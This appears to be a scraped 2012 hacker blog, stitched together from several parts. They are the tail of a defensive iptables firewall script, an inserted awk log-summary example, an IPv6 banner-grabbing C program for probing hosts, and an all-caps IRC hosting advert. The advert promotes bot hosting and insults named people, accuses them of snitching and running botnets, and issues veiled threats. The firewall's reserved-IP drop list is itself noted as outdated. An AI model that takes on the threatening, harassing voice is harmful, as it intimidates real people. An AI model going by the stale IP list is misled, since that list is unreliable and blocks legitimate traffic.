if [ -n "${DISALLOW_SOURCE_ROUTED_PACKETS}" ]; then
sr_pack="0"
fi
for i in /proc/sys/net/ipv4/conf/*/accept_source_route; do
echo "Setting routed packed disallowing on ${i} to ${sr_pack}"
echo ${sr_pack} > ${i}
done

if [ -n "${TCP_FIN_TIMEOUT}" ]; then
echo "Setting tcp_fin_timeout to ${TCP_FIN_TIMEOUT}"
echo "${TCP_FIN_TIMEOUT}" > /proc/sys/net/ipv4/tcp_fin_timeout
fi
if [ -n "${TCP_KEEPALIVE_TIME}" ]; then
echo "Setting tcp_keepalive_time to ${TCP_KEEPALIVE_TIME}"
echo "${TCP_KEEPALIVE_TIME}" > /proc/sys/net/ipv4/tcp_keepalive_time
fi
w_scal="1"
if [ -n "${DISALLOW_TCP_WINDOW_SCALING}" ]; then
w_scal="0"
fi
echo "Setting tcp_window_scaling to ${w_scal}"
echo "${w_scal}" > /proc/sys/net/ipv4/tcp_window_scaling

# TCP timestamp
echo "Setting tcp_timestamps to ${TCP_TIMESTAMP}"
echo "${TCP_TIMESTAMP}" > /proc/sys/net/ipv4/tcp_timestamps

# disallow multicast routing
# TODO: doesn't work
#m_rout="1"
#if [ -n "${DISALLOW_MULTICAST_ROUTING}" ]; then
#    m_rout="0"
#fi
#for i in /proc/sys/net/ipv4/conf/*/mc_forwarding; do
#    echo "Setting multicast forwarding on ${i} to ${m_rout}"
#    echo ${m_rout} > ${i}
#done

# disallow proxy_arp
p_arp="1"
if [ -n "${DISALLOW_PROXY_ARP}" ]; then
p_arp="0"
fi
for i in /proc/sys/net/ipv4/conf/*/proxy_arp; do
echo "Setting proxy_arp on ${i} to ${p_arp}"
echo ${p_arp} > ${i}
done

bp_rel="1"
if [ -n "${DISALLOW_BOOTP_RELAY}" ]; then
bp_rel="0"
fi
for i in /proc/sys/net/ipv4/conf/*/bootp_relay; do
echo "Setting bootp_relay on ${i} to ${bp_rel}"
echo ${bp_rel} > ${i}
done

s_redir="0"
if [ -n "${ENABLE_SECURE_ICMP_REDIRECTS}" ]; then
s_redir="1"
fi
for i in /proc/sys/net/ipv4/conf/*/secure_redirects; do
echo "Setting secure_redirects on ${i} to ${s_redir}"
echo ${s_redir} > ${i}
done

# enable changes
echo 1 > /proc/sys/net/ipv4/route/flush

# create some custom chains, useful for logging
# LOG packets, then ACCEPT
RLIMIT="-m limit --limit 3/s --limit-burst 8"
"${IPTABLES}" -N ACCEPTLOG
"${IPTABLES}" -A ACCEPTLOG -j ${LOG} ${RLIMIT} --log-prefix "ACCEPT "
"${IPTABLES}" -A ACCEPTLOG -j ACCEPT
# LOG packets, then DROP.
"${IPTABLES}" -N DROPLOG
"${IPTABLES}" -A DROPLOG -j ${LOG} ${RLIMIT} --log-prefix "DROP "
"${IPTABLES}" -A DROPLOG -j DROP
# LOG packets, then REJECT.
# TCP packets are rejected with a TCP reset.
"${IPTABLES}" -N REJECTLOG
"${IPTABLES}" -A REJECTLOG -j ${LOG} ${RLIMIT} --log-prefix "REJECT "
"${IPTABLES}" -A REJECTLOG -p tcp -j REJECT --reject-with tcp-reset
"${IPTABLES}" -A REJECTLOG -j REJECT
echo "Generated chains: ACCEPTLOG, DROPLOG, REJECTLOG"

# setup local communication
"${IPTABLES}" -A INPUT -i ${LO_IF} -j ACCEPT
"${IPTABLES}" -A OUTPUT -o ${LO_IF} -j ACCEPT

if [ -n "${DMZ_IF}" ]; then
"${IPTABLES}" -A INPUT -i ${DMZ_IF} -j ACCEPT
"${IPTABLES}" -A OUTPUT -o ${DMZ_IF} -j ACCEPT
echo "Permit all traffic on ${DMZ_IF}"
fi

# disable ports explicitly
for port in ${PORTS_TO_DISABLE}; do
"${IPTABLES}" -A INPUT -p tcp --dport ${port} -j DROPLOG
echo "Disabled input port ${port} on ${NET_IF} (tcp) (DROPLOG)"
"${IPTABLES}" -A INPUT -p udp --dport ${port} -j DROPLOG
echo "Disabled input port ${port} on ${NET_IF} (udp) (DROPLOG)"
done

if [ -n "${KILL_PORT_SCANNING}" ]; then
echo "Killing port scanning attempts on ${NET_IF}, against port ${PORT_SCANNING_PORT}, ban seconds: ${PORT_SCANNING_SECONDS}"
"${IPTABLES}" -A INPUT -i ${NET_IF} -m recent --name portscan --rcheck --seconds "${PORT_SCANNING_SECONDS}" -j DROP
"${IPTABLES}" -A FORWARD -m recent --name portscan --rcheck --seconds "${PORT_SCANNING_SECONDS}" -j DROP

# Once the day has passed, remove them from the portscan list
"${IPTABLES}" -A INPUT -i ${NET_IF} -m recent --name portscan --remove
"${IPTABLES}" -A FORWARD -m recent --name portscan --remove

# These rules add scanners to the portscan list, and log the attempt.
"${IPTABLES}" -A INPUT -i ${NET_IF} -p tcp -m tcp --dport "${PORT_SCANNING_PORT}" -m recent --name portscan --set -j LOG --log-prefix "Portscan(host_destroyed): "
"${IPTABLES}" -A INPUT -i ${NET_IF} -p tcp -m tcp --dport "${PORT_SCANNING_PORT}" -m recent --name portscan --set -j DROP

"${IPTABLES}" -A FORWARD -p tcp -m tcp --dport "${PORT_SCANNING_PORT}" -m recent --name portscan --set -j LOG --log-prefix "Portscan(host_destroyed): "
"${IPTABLES}" -A FORWARD -p tcp -m tcp --dport "${PORT_SCANNING_PORT}" -m recent --name portscan --set -j DROP
fi

# UDP
for port in ${UDP_PORTS_INCOMING_ALLOW}; do
"${IPTABLES}" -A INPUT -p udp --dport ${port} --sport 1024:65535 -j ACCEPT
"${IPTABLES}" -A OUTPUT -p udp --sport ${port} --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
echo "Allowing UDP incoming traffic on ${port} on ${NET_IF} (ACCEPT)"
done
for port in ${UDP_PORTS_OUTGOING_ALLOW}; do
"${IPTABLES}" -A OUTPUT -p udp --dport ${port} --sport 1024:65535 -j ACCEPT
"${IPTABLES}" -A INPUT -p udp --sport ${port} --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
echo "Allowing UDP outgoing traffic on ${port} on ${NET_IF} (ACCEPT)"
done

# TCP
for port in ${TCP_PORTS_INCOMING_ALLOW}; do
"${IPTABLES}" -A INPUT -p tcp --dport ${port} --sport 1024:65535 -j ACCEPT
"${IPTABLES}" -A OUTPUT -p tcp --sport ${port} --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
echo "Allowing TCP incoming traffic on ${port} on ${NET_IF} (ACCEPT)"
done
for port in ${TCP_PORTS_OUTGOING_ALLOW}; do
"${IPTABLES}" -A OUTPUT -p tcp --dport ${port} --sport 1024:65535 -j ACCEPT
"${IPTABLES}" -A INPUT -p tcp --sport ${port} --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
echo "Allowing TCP outgoing traffic on ${port} on ${NET_IF} (ACCEPT)"
done

# Timed ports
for port in ${TIMED_PORTS}; do
# TCP
"${IPTABLES}" -I INPUT -p tcp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --set
# log before TIMED_PORTS_HIT_COUNT
"${IPTABLES}" -I INPUT -p tcp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --update \
--seconds ${TIMED_PORTS_TIMER_SECS} --hitcount $((${TIMED_PORTS_HIT_COUNT}-1)) -j LOG
"${IPTABLES}" -I INPUT -p tcp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --update \
--seconds ${TIMED_PORTS_TIMER_SECS} --hitcount ${TIMED_PORTS_HIT_COUNT} -j DROP
echo "Setting up timed port feature on ${port} on ${NET_IF} (tcp) [seconds:${TIMED_PORTS_TIMER_SECS}|hit_count:${TIMED_PORTS_HIT_COUNT}] (DROP)"
# UDP
"${IPTABLES}" -I INPUT -p udp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --set
# log before TIMED_PORTS_HIT_COUNT
"${IPTABLES}" -I INPUT -p udp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --update \
--seconds ${TIMED_PORTS_TIMER_SECS} --hitcount $((${TIMED_PORTS_HIT_COUNT}-1)) -j LOG
"${IPTABLES}" -I INPUT -p udp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --update \
--seconds ${TIMED_PORTS_TIMER_SECS} --hitcount ${TIMED_PORTS_HIT_COUNT} -j DROP
echo "Setting up timed port feature on ${port} on ${NET_IF} (udp) [seconds:${TIMED_PORTS_TIMER_SECS}|hit_count:${TIMED_PORTS_HIT_COUNT}] (DROP)"

done

# ignore microsoft ports?
if [ -n "${IGNORE_MICROSOFT_SHIT}" ]; then
"${IPTABLES}" -A INPUT -p tcp -m multiport --dports 135,137,138,139,445,1433,1434,3306 -j DROP
"${IPTABLES}" -A INPUT -p udp -m multiport --dports 135,137,138,139,445,1433,1434,3306 -j DROP
fi

# ICMP TYPES
"${IPTABLES}" -N RELATED_ICMP
if [ -n "${ALLOW_SANE_ICMP}" ]; then
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp -m icmp -m limit --limit "${ICMP_PACKETS_PER_SECOND}/second" -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp --icmp-type destination-unreachable -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp --icmp-type time-exceeded -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp --icmp-type echo-reply -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp --icmp-type echo-request -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp --icmp-type parameter-problem -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -j DROPLOG
echo "Allowing sane ICMP, only accept some reliable ICMP packets"
elif [ -n "${FUCK_ICMP_I_DONT_NEED_IT}" ]; then
# 1 makes the kernel ignore all ICMP echo requests; 0 (the old value here) re-enables them
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
echo "Ignoring all ICMP traffic"
fi
ignore_icmp_broadcast="0"
if [ -n "${IGNORE_ICMP_BROADCASTS}" ]; then
# ignore broadcast requests
ignore_icmp_broadcast="1"
fi
echo "Ignoring ICMP echo broadcasts"
echo ${ignore_icmp_broadcast} > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts

# Rate Limit RST packets
if [ -n "${RST_PACKETS_PER_SECOND}" ]; then
"${IPTABLES}" -A INPUT -p tcp -m tcp --tcp-flags RST RST -m limit --limit "${RST_PACKETS_PER_SECOND}/second" --limit-burst 2 -j ACCEPT
fi

# make it even harder to multi-ping
"${IPTABLES}" -A INPUT -p icmp -m limit --limit 1/s --limit-burst 2 -j ACCEPT
"${IPTABLES}" -A INPUT -p icmp -m limit --limit 1/s --limit-burst 2 -j LOG --log-prefix PING-DROP:
# NOTE: this unconditional DROP catches every incoming ICMP packet the limited ACCEPT above did not take,
# so the INPUT ICMP rules further down (ESTABLISHED/RELATED state checks, echo-request) are never reached
"${IPTABLES}" -A INPUT -p icmp -j DROP
"${IPTABLES}" -A OUTPUT -p icmp -j ACCEPT
# Drop all fragmented ICMP packets; fragmented ICMP is rare in normal traffic and a classic DoS/evasion pattern
"${IPTABLES}" -A INPUT -p icmp --fragment -j DROPLOG
"${IPTABLES}" -A OUTPUT -p icmp --fragment -j DROPLOG
"${IPTABLES}" -A FORWARD -p icmp --fragment -j DROPLOG
# Allow all ESTABLISHED ICMP traffic.
"${IPTABLES}" -A INPUT -p icmp -m state --state ESTABLISHED -j ACCEPT ${RLIMIT}
"${IPTABLES}" -A OUTPUT -p icmp -m state --state ESTABLISHED -j ACCEPT ${RLIMIT}
# Allow some parts of the RELATED ICMP traffic, block the rest.
"${IPTABLES}" -A INPUT -p icmp -m state --state RELATED -j RELATED_ICMP ${RLIMIT}
"${IPTABLES}" -A OUTPUT -p icmp -m state --state RELATED -j RELATED_ICMP ${RLIMIT}
# Allow incoming ICMP echo requests (ping), but only rate-limited.
"${IPTABLES}" -A INPUT -p icmp --icmp-type echo-request -j ACCEPT ${RLIMIT}
# Allow outgoing ICMP echo requests (ping), but only rate-limited.
"${IPTABLES}" -A OUTPUT -p icmp --icmp-type echo-request -j ACCEPT ${RLIMIT}
# Drop any other ICMP traffic.
"${IPTABLES}" -A INPUT -p icmp -j DROPLOG
"${IPTABLES}" -A OUTPUT -p icmp -j DROPLOG
"${IPTABLES}" -A FORWARD -p icmp -j DROPLOG
echo "Configured strict ICMP rules"

# explicitly drop invalid incoming/outgoing traffic
"${IPTABLES}" -A INPUT -m state --state INVALID -j DROP
"${IPTABLES}" -A OUTPUT -m state --state INVALID -j DROP
# If NAT were in use, INVALID packets could still pass through FORWARD - block them there as well
"${IPTABLES}" -A FORWARD -m state --state INVALID -j DROP
echo "Dropped all INVALID incoming/outgoing traffic"

# PORT Scanners (stealth also)
"${IPTABLES}" -A INPUT -m state --state NEW -p tcp --tcp-flags ALL ALL -j DROP
"${IPTABLES}" -A INPUT -m state --state NEW -p tcp --tcp-flags ALL NONE -j DROP
echo "Made port-scanner life harder"

if [ -n "${SYN_FLOOD_PROTECTION}" ]; then
"${IPTABLES}" -N SYN_FLOOD
"${IPTABLES}" -A INPUT -p tcp --syn -j SYN_FLOOD
"${IPTABLES}" -A SYN_FLOOD -m limit --limit 2/s --limit-burst 6 -j RETURN
"${IPTABLES}" -A SYN_FLOOD -j DROP
echo "SYN flood protection enabled (limit 2/s, burst of 6 packets)"
fi

if [ -n "${DROP_IANA_IPS}" ]; then
# NOTE: this list dates from when the script was written. IANA handed its last unallocated /8 blocks to the
# regional registries in February 2011, so most of the large ranges below (for example 23.0.0.0/8, 50.0.0.0/8,
# 173.0.0.0/8 and all of 96.0.0.0/4) now carry ordinary unicast traffic, and 0.0.0.0/7 also swallows 1.0.0.0/8.
# Only the RFC 1918 (10/8, 172.16/12), link-local (169.254/16), TEST-NET (192.0.2.0/24), benchmark (198.18/15)
# and multicast ranges are still safe to drop; note that 224.0.0.0/24 is only the local-network control block,
# the whole multicast range is 224.0.0.0/4 and the reserved block is 240.0.0.0/4.
"${IPTABLES}" -A INPUT -s 0.0.0.0/7 -j DROP
"${IPTABLES}" -A INPUT -s 2.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 5.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 7.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 10.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 23.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 27.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 31.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 36.0.0.0/7 -j DROP
"${IPTABLES}" -A INPUT -s 39.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 42.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 49.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 50.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 77.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 78.0.0.0/7 -j DROP
"${IPTABLES}" -A INPUT -s 92.0.0.0/6 -j DROP
"${IPTABLES}" -A INPUT -s 96.0.0.0/4 -j DROP
"${IPTABLES}" -A INPUT -s 112.0.0.0/5 -j DROP
"${IPTABLES}" -A INPUT -s 120.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 169.254.0.0/16 -j DROP
"${IPTABLES}" -A INPUT -s 172.16.0.0/12 -j DROP
"${IPTABLES}" -A INPUT -s 173.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 174.0.0.0/7 -j DROP
"${IPTABLES}" -A INPUT -s 176.0.0.0/5 -j DROP
"${IPTABLES}" -A INPUT -s 184.0.0.0/6 -j DROP
"${IPTABLES}" -A INPUT -s 192.0.2.0/24 -j DROP
"${IPTABLES}" -A INPUT -s 197.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 198.18.0.0/15 -j DROP
"${IPTABLES}" -A INPUT -s 223.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 224.0.0.0/24 -j DROP
echo "Dropped all IANA-reserved IP ranges"
fi

# reject identd (113/tcp) straight away instead of silently dropping it, so IRC servers don't wait for the lookup to time out
if [ -n "${KILL_IDENTD}" ]; then
"${IPTABLES}" -A INPUT -p tcp -i ${NET_IF} --dport 113 -j REJECT --reject-with tcp-reset
echo "Rejected identd requests on ${NET_IF} (REJECT with tcp-reset)"
fi

if [ -f "${CUSTOM_RULES_FILE_POST}" ]; then
source "${CUSTOM_RULES_FILE_POST}"
fi

# final catch-all for both TCP and UDP: anything not matched above is sent to REJECTLOG
"${IPTABLES}" -A OUTPUT -j REJECTLOG
"${IPTABLES}" -A INPUT -j REJECTLOG
"${IPTABLES}" -A FORWARD -j REJECTLOG

enjoy some protection!

xd
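As an added example (not part of xd's firewall script), the POSIX shell function below summarises the kernel log lines that the `--log-prefix PING-DROP:` rule above produces, so a defender can see which sources keep tripping the 1/s ICMP limit and when they were first and last seen. The log lines are constructed to match the iptables LOG target format (prefix immediately followed by `IN=`, then `SRC=`/`DST=` fields), assume syslog-style lines whose third field is the time, and use RFC 5737 documentation addresses.

```shell
#!/bin/sh
# Added example, not part of xd's firewall script: summarise what the
# "PING-DROP:" LOG rule writes to the kernel log. The lines below are
# constructed to match the iptables LOG target format and use RFC 5737
# documentation addresses; the fourth line has no PING-DROP: prefix and
# must be ignored.

PING_DROP_SAMPLE='Jan 18 10:00:01 gw kernel: [ 1234.100000] PING-DROP:IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=198.51.100.7 DST=192.0.2.10 LEN=84 TOS=0x00 PREC=0x00 TTL=54 ID=31337 PROTO=ICMP TYPE=8 CODE=0 ID=4242 SEQ=1
Jan 18 10:00:02 gw kernel: [ 1235.100000] PING-DROP:IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.9 DST=192.0.2.10 LEN=84 TOS=0x00 PREC=0x00 TTL=49 ID=1 PROTO=ICMP TYPE=8 CODE=0 ID=7 SEQ=1
Jan 18 10:00:03 gw kernel: [ 1236.100000] PING-DROP:IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=198.51.100.7 DST=192.0.2.10 LEN=84 TOS=0x00 PREC=0x00 TTL=54 ID=31338 PROTO=ICMP TYPE=8 CODE=0 ID=4242 SEQ=2
Jan 18 10:00:04 gw kernel: [ 1237.100000] IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.9 DST=192.0.2.10 LEN=60 TOS=0x00 PREC=0x00 TTL=49 ID=2 DF PROTO=TCP SPT=40001 DPT=113 WINDOW=29200 RES=0x00 SYN URGP=0
Jan 18 10:00:05 gw kernel: [ 1238.100000] PING-DROP:IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=198.51.100.7 DST=192.0.2.10 LEN=84 TOS=0x00 PREC=0x00 TTL=54 ID=31339 PROTO=ICMP TYPE=8 CODE=0 ID=4242 SEQ=3'

# ping_drop_sources MIN
# Reads syslog lines on stdin and prints "<hits> <src> <first-seen> <last-seen>"
# for every source with at least MIN PING-DROP entries, busiest source first.
# Only lines carrying the PING-DROP: prefix are counted; any other LOG line
# (for example the TCP line in the sample) is skipped.
ping_drop_sources() {
    min="${1:-1}"
    awk -v min="$min" '
        /PING-DROP:/ {
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^SRC=/) {
                    src = substr($i, 5)              # strip the "SRC=" label
                    if (!(src in hits)) first[src] = $3   # $3 is the syslog time
                    hits[src]++
                    last[src] = $3
                }
            }
        }
        END {
            for (s in hits)
                if (hits[s] >= min)
                    printf "%d %s %s %s\n", hits[s], s, first[s], last[s]
        }' | sort -rn
}

# Stand-alone run: sources that tripped the limit at least twice.
printf '%s\n' "$PING_DROP_SAMPLE" | ping_drop_sources 2
```

In production feed it from `journalctl -k` or the kernel log file and raise MIN to the hit count you consider worth a block.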

[IPv6 Stuff]: IPv6 banner grabber… of course this will also get you the ipv4…. thx to r0t0r for this 1

Posted on 19th April 2012 in Codes, Exploits, Papers

Awesome code! written by a 13yr old, or well, when rotor was a young tadpole :P ~~

Thanks mate, this is definitely going into the IPv6 toolkit I'll be releasing soon on dd0s.ucoz.com or on bsd-demons.com, anywhere who will have me :0

Love the code, love the reasons why it was made… remember what this is for: grabbing the banner from the cisco modem if it is using it (usually most hosters do..), and then you would have ipv6 and ipv4 addys… enjoy and thx to rotor but, i will possibly try to improve on this.. *TRY*

xd


/*
* c1zc0-cb4n6.c - ipv6 banner grabber
* by rotor  || bsd-demons.com

* stolen for my toolkit by xd :P ~ love ya mate!

* greetz to haxnet,hacked and fuck icer in the ass . and oh, did i forget krashed, ye fuck u to bitch.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

void usage(char *nme);

int main(int argc, char *argv[]) {
    int sock;
    struct sockaddr_in6 target;
    struct hostent *hostname;
    char buff[1024];
    ssize_t n;

    if (argc < 3) {
        usage(argv[0]);
    }
    printf("%s %s\n", argv[1], argv[2]);
    if ((sock = socket(AF_INET6, SOCK_STREAM, 0)) < 0) {
        perror("error creating socket");
        exit(1);
    }
    memset(&target, 0, sizeof(target));
    /* resolve the host's AAAA record */
    if ((hostname = gethostbyname2(argv[1], AF_INET6)) == NULL) {
        printf("error gethostbyname2\n");
        exit(1);
    }
    /* the original passed argv[2] (a pointer) to htons(); the port has to be converted to a number first */
    target.sin6_port = htons((unsigned short)atoi(argv[2]));
    target.sin6_family = AF_INET6;
    memcpy(&target.sin6_addr, hostname->h_addr, hostname->h_length);
    if (connect(sock, (struct sockaddr *)&target, sizeof(struct sockaddr_in6)) < 0) {
        perror("connect");
        close(sock);
        exit(1);
    }
    /* read whatever the service sends first and NUL-terminate it before printing */
    n = read(sock, buff, sizeof(buff) - 1);
    if (n > 0) {
        buff[n] = '\0';
        printf("%s", buff);
    }
    close(sock);
    return 0;
}

void usage(char *nme) {
    printf("%s <Host> <Port>[TRY 23]\n", nme);
    exit(0);
}

and it will not end until everyone has the ability to grab IPv4 from IPv6, there will be NO *hiding*. thx.

XD

LINUX HOSTING/IRC/ANTI-DoS NETWORK ~ GLOWSHELLS.NET IS FINALLY REOPENING!

Posted on 26th March 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

YEP FOLKS IT IS TRUE…

JUST WAITING ON FINALISING 2 OF THE DEDIS/COLOS AND ARE UP! THIS IS VERY AWESOME NEWS FOR ANYONE WHO STILL CARES FOR IRC!

YOU CAN BELIEVE IT GLOW WILL BEAT ANYONE, OFFER GTCOMM/STAMINUS/HOSTVIRTUAL AND ANOTHER UNNAMED COMPANY FOR ALL HOSTING/INCLUDES SOME WEB HOSTING EVEN IN SOME SPECIAL CASES IF THATS WHAT IS WANTED THEN GLOW WILL DO IT, IPV6 AND IPV4, THE GTCOMM BOXES ARE IRC/SHOUTCAST/IRCD/ANYTHING-YOU-WANT-ON-IRC BOXES AND, AT MOMENT IN MIDDLE OF PURCHASING THE DEDIS, AND, THE COLO BOX :D

REALLY GLOW COULD OPEN AND HAVE OPENED AGES AGO, BUT, THEY JUST WAITED TO GET SOME DECENT IPV4 BACKBONES.. SO I GUESS THEY'RE USABLE BUT, THEY'RE JUST GOING TO ACTUALLY COMPETE, SOON… WHICH WILL BE GREAT FOR EFNET.. AS, IT NEEDS THIS TYPE OF CO.

SOME MEMBERS WHO HAVE BEEN WITH US FOR AWHILE, WILL REALLY BE ADMINISTRATING THNGS, ALTHO, IT WILL BE ONLY THE SAME OWNER AS BEFORE *MOUSE_*WHO WILL BE HANDLING THE MAIN THINGS.

MOST OF IT THEN, WILL HAVE AN ADMIN OR ONE AND ONE CO ADMIN PER BOX WHICH WILL BE ON CALL 24/7 AND IF NOT YOU GET 1 MONTH REFUND, YEP THATS THE TRUTH, IF YOU ENTER, AND, ARE CUSTOMER, AND ARE NOT HELPED WITHIN 15 MINUTES OF YOUR CHANNEL STAY, THE MONTH OR, A VHOST, SOMETHING, IS AUTOMATICALLY AND MAGICALLY, FREE!!! CANT BEAT THAT FOR SERVICE, AT LEAST YA KNOW IT GONNA BE GOOD!

SINCE THE BOXES ARE IN USA/CANADA/FRANCE/NETHERLANDS/SINGAPORE ,WE DECIDED TO MAKE 100% UPTIME BOXES,AND THAT IS SIMPLY USING ONE GTCOMM ADDY, FOR IRC OFCOURSE, WICH SITS ON A 4000GBPS ANTI D0S NETWORK.IT IS THE BEST GLOW IS ABLE AND CAN DO AND IT IS ALSO THE MOST EXPENSIVE NETWORKING, AND REQUORES VERY HIGH ID FOR JUST AX, IS THE MOST EXPENSIVE ROUTE TO TAKE FOR ANY SERVER SETUPS I HAVE SEEN… THIS SEEMS LIKE A ROBUST SERVICE AND, BOASTING ALREADY 400 VHOSTS JUST IN IPV6, WICH HALF ARE NOT EVEN TURNED ON APPRENTLY..MEANING, THEY HAVE OMUCH, THEY REALLY NOW, JUST WANT TO MAKE IT SHARED AND, FOR THOSE WHO WANT 100% UPTIME WRAITH BOTPAX ETC, WELL, HOW CAN YA BEAT, A LOGIN WICH HAS 4 BOXES IN 4 COUNTRIES!! HAHA! YA CANT, IT IS PERFECT, YOU CONTROL THEM, YOU HAVE 100% CONTROL.. SO, YOU GET A 100% AWESOME PRODUCT IN THE END!!! IT IS AWESOME FOR ANYONE HOSTING WRAITH, AND JUST NOW AS IT IS ON THE VPS GTCOMM, IT IS ALREADY HOSTING VERY EASILY, OVER 5-6 PEOPLE AND, THATS WITH OVER 30 WRAITHS NOW..AND NOT ONE BIT OF LAG.

ALTHO THERE WILL BE A COLO BOX THIS WONT BE OPENING FOR AT LEAST ONE MONTH BUT THE DEDIS WILL OPEN THIS WEEK, AND THE VPS IS ACTUALLY UP, IS FINE FOR HOSTING SO GLOW HAVE ALREADY BEEN NOW ACCEPTING NEW PEOPLE WHO ARE SIMPLY FED UP WITH ONE BOX/LOCATION AND/OR, SIMPLY KNOW THE DEDICATION GLOWSHELLS HAS ALWAYS HAD WITH EFNET.

AS I UNDERSTAND IT WILL BE USING UNDERNET/AUSTNET/EFNET/DALNET/LCIRC/RIZON AND MOST COVERED NETWORKS WHO, WELL I ASSUME THOSE WERE OLD PLACES USED..

 

I KNOW FOR AUSSIES THIS IS ESPECIALLY COOL, AS ONE OF THE ADMINS IS AN AUSSIE, AND, HE IS NOT HALF BAD WHEN YOU ACTUALLY ARE NOT CALLING HIM AN A**E ETC..

 

ANYHOW FACT IS, GLOWSHELLS HAS AND ALWAYS WILL BE LIKE NO-OTHER, AND AT MOMENT IF YOUR INTERESTED IN ANYTHING THEN, HEAD TO EFNET IRC IRC.EFNET.ORG AND JOIN #GLOWSHELL-SUPPORT AND SIMPLY WAIT AND, WELL IM JUST WAITING TO SEE MOUSE OPPED AGAIN WHERE SHE SHOULD BE :D

 

I THANK PEOPLE ON EFNET, SPECIALLY SOME LIKE, RFS,CYPHER,FUZION,GIZMORE/WECHALL CHALLENGES,SERH,R0X0R,LORDNIKON,D3MON AND EINS AND EVEN JIMIGJ! HECK, YOU ALL HAVE SOMETHING UNIQUE IN SOME WAY…AND, I WILL BE SURE EVEYONE OF YOU IS HELPED…TALI FOR ALL YOUR HELP WITHOUT HARDLY KNOWING ME, WITH THE GTCOMM FAKE CHANNELS LOL)… AND, FUCKS TO ICER AND KRASHED, AND, YOU BOTH KNOW WHY, YOUR FUCKING BOTH BEEN BUSTED, BOTH HELPIN EACH OTHER, AND PEOPLE ARE STILL GETTING BUSTED…NOW, SINCE I HAVE REPORTED MR KRASHED TO GTCOMM, HIS DDOS HAS STOPPED.AND, I STILL DONT EVEN KNOW WHY HE DID NOT SIMPLY, TALK TO ME, LIKE HUMANS DO.

ANYHWO THINK HARD AND TALK FAST ARSEHOLE… BECAUSE, YOUR THE ONLY SOUR GRAPE IN MY MOUTH.

NOW, AS I WAS SAYING, ENJOY THE RETURN OF GLOWSHELLS AND BE NICE AS ALWAYS! HA!

DRU / XD / WORLDWIDE / KRYPTIK / AKA TEAM 0X90 , YEA, BITCHEZ, THE REAL DEAL HAS NEVER BEEN SO IN YA FACE.

 

NOW READ ON…

 

AND ON THE SOUR NOTE:

AS FOR ICER, YOU HAD A PACT WITH SOMEONE TO MAKE SOMETHING, YOU KNOW, SOMETIMES PEOPLE RELY ON THOSE FUNDS,A ND, WERE OF THE THOUGHTS THAT PERHAPS, YOU WERE IN NO PORBLEMS AS, YOU HAD NOT SAID ANYTHING AND, ASSUMED, EVEYTHING WAS GOING FINE, BUT, AS YOU SAW, IT WAS, ABIT OF DISTRUST ON ONE SIDE BUT, YOU HAD THE CHANCE TO TALK TO THE WEB DESIGNER AND INSTEAD YOU GO HAND THE MONEY TO SOME FUCKING YANKEE WHO PROLLY DOESNT NEED IT.

WELL YOU WILL PAY 200X 10, ATLEAST FOR THAT INSULT YOU SHIT HEAD.

AND NO, I DONT THINK YOUR A *FED* BUT, I DEFINATELY WONDER WHY YOU WOULD ALLOW THIS KRASHED FELLOW, WHO IS A KNOWN HBI SNITCHER, TO HAVE SOMUCH DAMNA XCS TO THE BOTS AND, EVEYTHING IT SEEMS ABOUT YOUR MAGICSHELLS FILTH COMPANY..AND OH FUNNY BUT, WHEN I INVESTIGATED THE IPS, I FOUND OMETHING FUNNY…YEA…AND, I WONT MENTION IT HERE BUT LETS JUST SAY, SHAME ON YOU FOR ALLOWING ANYONE TO RUN B OTNET FROM YOUR SHIT YOU MAGGOT. AND REMEMBER WHERE YOU LIVE, AND THEN WHY THEY ARE SO COCKY AND WHERE THEY LIVE.
